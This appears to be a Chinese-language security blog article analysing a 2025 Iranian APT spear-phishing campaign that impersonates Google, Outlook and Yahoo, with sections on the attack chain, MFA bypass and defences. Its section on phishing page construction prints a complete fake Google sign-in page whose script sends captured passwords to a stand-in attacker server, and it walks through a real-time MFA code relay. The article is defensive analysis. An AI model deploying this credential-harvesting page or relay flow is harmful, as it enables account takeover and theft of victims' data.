引言
近年来,高级持续性威胁(Advanced Persistent Threat, APT)攻击日益成为国家间网络对抗的重要形式。其中,鱼叉式钓鱼(Spear Phishing)因其高针对性、强隐蔽性和低技术门槛,被多个国家级黑客组织广泛采用。2025年6月,Check Point Research披露了一起由伊朗关联APT组织“Educated Manticore”(又称APT42、Charming Kitten或Mint Sandstorm)发起的全球性鱼叉式钓鱼活动。该组织长期隶属于伊朗伊斯兰革命卫队情报机构(IRGC Intelligence Organization),其攻击目标涵盖以色列及西方国家的政府官员、学术研究人员、媒体从业者等高价值个体。
本次攻击的核心特征在于对主流互联网服务品牌的高度仿冒,尤其是对Google、Outlook、Yahoo等电子邮件和协作平台的域名与用户界面进行精细化复刻。攻击者通过注册大量形似合法的钓鱼域名(如 google-login[.]com、secure-outlook[.]net 等),结合社交工程手段诱导受害者在伪造页面输入凭证,并进一步绕过多因素认证(Multi-Factor Authentication, MFA)机制,实现账户完全接管。值得注意的是,部分攻击邮件不仅包含目标姓名、所属机构等定制化信息,甚至模仿真实会议邀请(如Google Meet链接),极大提升了欺骗成功率。
本文旨在系统剖析此次伊朗APT组织鱼叉式钓鱼攻击的技术实现路径、社会工程策略、绕过MFA的机制及其对现有安全防御体系的挑战。全文将围绕攻击链展开,依次分析初始接触、信任建立、凭证窃取、MFA绕过与后续渗透等关键环节,并辅以实际代码示例说明钓鱼页面的构造逻辑与检测难点。最后,基于攻击特征提出可落地的防御建议,强调纵深防御与用户意识培训的协同作用。本研究不依赖主观推测,所有技术细节均基于公开披露的攻击样本与安全厂商报告,确保分析的客观性与准确性。

一、攻击背景与组织画像
Educated Manticore自2014年起活跃于中东及欧美地区,其攻击行为具有明确的地缘政治动机。根据历史记录,该组织曾多次针对伊朗境外持不同政见者、人权活动家、外交人员及科技企业高管实施网络间谍活动。其战术偏好包括:使用虚假身份注册社交媒体账号、伪造新闻媒体网站(如《华盛顿邮报》《经济学人》)、发送伪装成职业机会或学术合作的诱饵邮件等。
在2025年本轮攻击中,Educated Manticore显著提升了技术复杂度。据Check Point统计,攻击者在短时间内注册超过100个钓鱼域名,其中多数采用国际化域名(IDN)混淆或字符替换(如用“0”代替“o”)规避传统黑名单检测。此外,攻击基础设施呈现高度分散化特征,服务器分布于多个国家,且频繁更换IP地址与SSL证书,增加溯源难度。
攻击目标高度聚焦于以色列境内关键人物,包括特拉维夫大学、魏茨曼科学研究所的计算机科学家,以及《国土报》《耶路撒冷邮报》等媒体的情报线记者。此类人群通常掌握敏感信息,且因工作需要频繁使用Google Workspace等云服务,成为理想的攻击入口。

二、攻击链技术分解
(一)初始接触:多通道诱导
与传统广撒网式钓鱼不同,本次攻击采用多通道协同策略。攻击者首先通过LinkedIn、Twitter等公开平台收集目标个人信息,随后通过以下任一方式发起接触:
电子邮件:发送看似来自Google安全团队的“异常登录提醒”或“账户验证请求”,邮件正文包含伪造的Google官方Logo、标准字体(Product Sans)及合规话术;
WhatsApp消息:冒充目标熟人或合作方,提议安排线上会议,并附带“Google Meet”链接;
虚假招聘邮件:以知名科技公司HR身份邀请目标参与面试,要求点击链接填写个人信息。
此类消息往往语法规范、格式严谨,甚至可能借助AI辅助生成文本,仅在细微处存在破绽(如发件人邮箱为 gmail-support@goog1e[.]com)。

(二)钓鱼页面构造与前端欺骗
一旦用户点击链接,将被重定向至攻击者控制的钓鱼站点。这些站点并非简单静态页面,而是采用现代Web框架(如React、Vue.js)动态渲染,模拟真实Google登录流程。以下为一个简化版钓鱼页面的核心HTML与JavaScript代码示例:
<!DOCTYPE html>
<html>
<head>
<meta charset="UTF-8">
<title>Sign in - Google Accounts</title>
<link href="https://ssl.gstatic.com/accounts/ui/logo_2x.png" rel="icon">
<style>
body { font-family: 'Product Sans', Arial, sans-serif; background: #fff; }
.login-container { width: 300px; margin: 100px auto; text-align: center; }
input[type="email"], input[type="password"] {
width: 100%; padding: 12px; margin: 8px 0; border: 1px solid #ccc; border-radius: 4px;
}
button { background: #4285f4; color: white; border: none; padding: 12px; width: 100%; border-radius: 4px; cursor: pointer; }
</style>
</head>
<body>
<div>
<img src="https://ssl.gstatic.com/accounts/ui/logo_2x.png" alt="Google" width="70">
<form id="phishForm">
<input type="email" id="email" name="email" placeholder="Email or phone" required>
<input type="password" id="password" name="password" placeholder="Enter your password" required>
<button type="submit">Next</button>
</form>
</div>
<script>
document.getElementById('phishForm').addEventListener('submit', function(e) {
e.preventDefault();
const email = document.getElementById('email').value;
const password = document.getElementById('password').value;
// 发送凭证至攻击者服务器
fetch('https://attacker-server[.]com/collect', {
method: 'POST',
headers: { 'Content-Type': 'application/json' },
body: JSON.stringify({ email: email, password: password })
}).then(() => {
// 重定向至真实Google页面以消除怀疑
window.location.href = 'https://accounts.google.com/';
});
});
</script>
</body>
</html>
该代码的关键欺骗点在于:
使用Google官方CDN资源(如Logo)增强视觉真实性;
表单提交后立即跳转至真实Google登录页,制造“操作成功”假象;
凭证通过异步请求(fetch)静默发送至攻击者控制端,用户无感知。
更复杂的变体还会预填充用户邮箱(通过URL参数传递),例如:
https://fake-google-login[.]com/?email=target@university.ac.il
页面JavaScript自动将该邮箱填入输入框,进一步提升可信度。
(三)多因素认证绕过机制
尽管目标普遍启用了MFA,攻击者仍通过“实时代理”(Real-time Proxy)或“会话劫持”策略绕过验证。具体流程如下:
用户在钓鱼页输入用户名密码后,攻击服务器立即将凭证转发至真实Google登录接口;
Google返回MFA挑战(如短信验证码、Google Prompt推送);
攻击者通过另一伪造页面(或直接通过WhatsApp)诱导用户输入收到的验证码;
验证码被实时提交至Google,完成身份验证,获取有效会话Cookie;
攻击者利用该Cookie直接访问用户邮箱、Drive等服务,无需再次认证。
此过程本质上是一种“中间人”攻击(Man-in-the-Middle, MitM),但发生在应用层而非网络层。其成功依赖于用户对“二次确认”的误解——误以为输入验证码是正常流程的一部分。
(四)后续渗透与横向移动
一旦账户被接管,攻击者可执行多种后续操作:
检索邮件历史,寻找敏感通信或内部系统凭证;
启用邮件自动转发规则,长期窃取新邮件;
利用Google Workspace权限申请访问共享文档或日历;
以受害者身份向其联系人发送新一轮钓鱼邮件,扩大攻击面。
在个别案例中,攻击者甚至通过WhatsApp提议线下会面(如“我们在特拉维夫咖啡馆详谈”),暗示可能存在物理跟踪或情报交接意图,凸显网络攻击与现实行动的融合趋势。
三、现有防御体系的局限性
当前主流安全措施在应对此类高级鱼叉式钓鱼时暴露出明显短板:
邮件网关过滤失效:由于攻击邮件内容无恶意附件或链接(链接指向看似合法的域名),且文本无明显异常,传统基于签名或关键词的过滤器难以识别。
浏览器安全警告滞后:尽管部分钓鱼域名未获得EV证书,但普通用户极少关注地址栏锁形图标细节;且攻击者常使用Let's Encrypt等免费CA签发有效SSL证书,使HTTPS标识反而成为“可信”佐证。
MFA机制被滥用:基于TOTP或短信的MFA无法抵御实时验证码窃取;即使使用FIDO2安全密钥,若用户被诱导在钓鱼站插入设备,仍可能触发认证(取决于实现方式)。
用户安全意识不足:高价值目标虽具备一定安全素养,但在高强度工作压力下易忽略细节,尤其当邮件内容与其日常事务高度相关时。
四、防御建议与技术对策
针对上述问题,需构建多层次防御体系:
(一)技术层面
部署高级邮件安全网关:采用基于AI的行为分析引擎,识别发件人信誉异常、域名相似度高等风险信号。例如,对包含“google”但顶级域非“.com”的链接自动标记。
启用条件访问策略(Conditional Access):在Microsoft Entra ID或Google Admin Console中配置策略,限制非常用地点、设备或IP的登录行为。即使凭证泄露,也可阻断会话建立。
推广无密码认证(Passwordless):鼓励使用通行密钥(Passkeys)或FIDO2安全密钥,其绑定特定RP(Relying Party)ID,无法在钓鱼站点使用。
实施会话监控与异常检测:通过SIEM系统监控账户登录日志,对短时间内多地登录、大量邮件导出等行为触发告警。
(二)管理与意识层面
定期开展红队演练:模拟真实鱼叉式钓鱼场景,评估员工识别能力,并针对性培训。
建立内部报告机制:鼓励员工上报可疑邮件,缩短响应时间。
最小权限原则:限制高管账户对敏感数据的默认访问权限,降低单点失陷影响。
五、结论
伊朗APT组织Educated Manticore在2025年发起的鱼叉式钓鱼攻击,展示了国家级网络间谍活动在品牌仿冒、社会工程与MFA绕过方面的高度成熟。攻击者不再依赖技术漏洞,而是精准利用人类认知盲区与现有认证体系的设计局限。本文通过还原攻击链各环节,揭示了从初始接触到凭证窃取的完整技术路径,并指出单纯依赖技术防护已不足以应对此类威胁。
有效的防御必须融合技术控制、策略优化与人员培训。尤其在地缘政治紧张加剧的背景下,高价值个体与关键基础设施运营者应重新评估其身份验证架构,优先部署抗钓鱼能力强的认证机制,并建立对异常交互的高度警觉。未来研究可进一步探索基于行为生物特征(如击键动力学、鼠标轨迹)的实时钓鱼检测模型,以在用户输入阶段即拦截攻击。网络空间的攻防对抗将持续演化,唯有保持技术敏锐性与防御纵深,方能抵御日益精巧的定向威胁。
编辑:芦笛(公共互联网反网络钓鱼工作组)
1201

被折叠的 条评论
为什么被折叠?



